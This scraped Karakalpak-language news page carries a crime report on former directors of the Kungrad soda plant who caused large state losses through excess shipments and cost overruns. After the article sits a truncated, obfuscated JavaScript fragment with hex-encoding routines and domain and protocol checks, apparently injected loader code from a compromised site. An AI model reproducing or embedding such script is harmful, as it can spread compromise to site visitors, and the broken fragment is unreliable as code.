Еркин Қарақалпақстан Вести Каракалпакстана 02:46:19, 02.06.2020
Хош келипсиз! | RSS
Сайт мазмуны

Кириў усылы

ҚЫЛМЫСЫНА ЖАРАСА ЖАЗА

«Қоңырат сода заводы» унитар кәрханасы тек республикамыздың емес, ал, Орайлық Азиядағы ири санаат кәрханаларынан бири есапланады. Оның республикамыздың социал-экономикалық жақтан раўажланыўындағы тутқан орнын бийкарлай алмаймыз. Лекин, нәпсин жылаўлай алмаған айырым кимселер тәрепинен әмелге асырылған нызамсыз ислерди көрип, усындай үлкен кәрхананың атына дақ салғанына ашынасаң.

Пикиримизди тастыйықлаў ушын мысал келти­рейик, 2011-жылдың 22-декабринен 2014-жылдың 6-август сәнесине шекем «Қоңырат сода заводы» унитар кәрханасы бас директоры лаўазымында ислеп келген Рашид Якубов исенип тапсырылған жуўапкерли лаўазымына немқурайды  қарап, кәрхананың басқа лаўазымлы хызметкерлери менен өз-ара жынайый тил бириктирип, 2013-жылдың 4-октябрь сәнесинде 284361-санлы хат пенен Ферғана қаласында жайласқан «KVARTS» АЖне шәртнамадан тысқары темир жол жүк вагонлары арқалы 95.392.200 сумлық 2 вагон кальцийлестирилген соданы артығы менен жеткерип берип, мәмлекет мүлкине үлкен муғдарда зыян келтиреди.

Сондай-ақ, Р.Якубов 2014-жылдың 5-август сәнесинен 2015-жылдың 24-январына шекем унитар кәрхананың бас директоры ўазыйпасын ўақтынша ат­қарыўшы лаўазымында ислеп келген Ахмет Бегдуллаев ҳәм басқа да бир қатар шахс­лар менен жынайый тил бириктирип, кәрханада ислеп шығарылатуғын кальцийлестирилген сода өниминиң 1,0 тоннасын таярлаў ушын жумсалатуғын қәрежетлер нормасы (калькуляция) «Ўзкимёсаноатлойиҳа» АЖ тәрепинен 2014-жыл 30-январьда дүзилип, «Ўзкимёсаноат» МАК  тәрепинен 2014-жыл 7-февральда тастыйықланған, 2014-жыл даўамында 88.664,5  тонна кальцийлестирилген сода ислеп шығарылған. Ал, бул ислеп шығарылған өнимниң нормативлик ҳүжжетлер салыстырылғанда 5087,0 тонна кальцийлестирилген сода өними ислеп шығарылатуғын қәрежетлер артықша жумсалып, нәтийжеде 2.408.221.409 сум жумсалыўына жол қойып, мәмлекет мүлкине жүдә көп муғдарда зыян келиўине себепши бол­ған.

Әлбетте, мақаламыздың «қаҳарман»ларының қылмыслары ҳуқық қорғаў уйым­лары хызметкерлери тәрепинен өз ўақтында анықланып, олар  Өзбекистан Республикасы Жынаят Кодексиниң тийисли статьялары бойынша жазаға тартылды.

А.РАХАТОВ.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "erkinkarakalpak.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Излеў

Көп оқылған мақалалар

Сыбайлас сайтлар

Қарақалпақстан Республикасы Жоқарғы Кеңеси ҳәм Министрлер Кеңесиниң газеталары.
Қарақалпақстан баспасөз ҳәм хабар агентлигинде 2007-жыл 7-февральда дизимге алынған. Гүўалық № 01-001
Developed by TUIT NF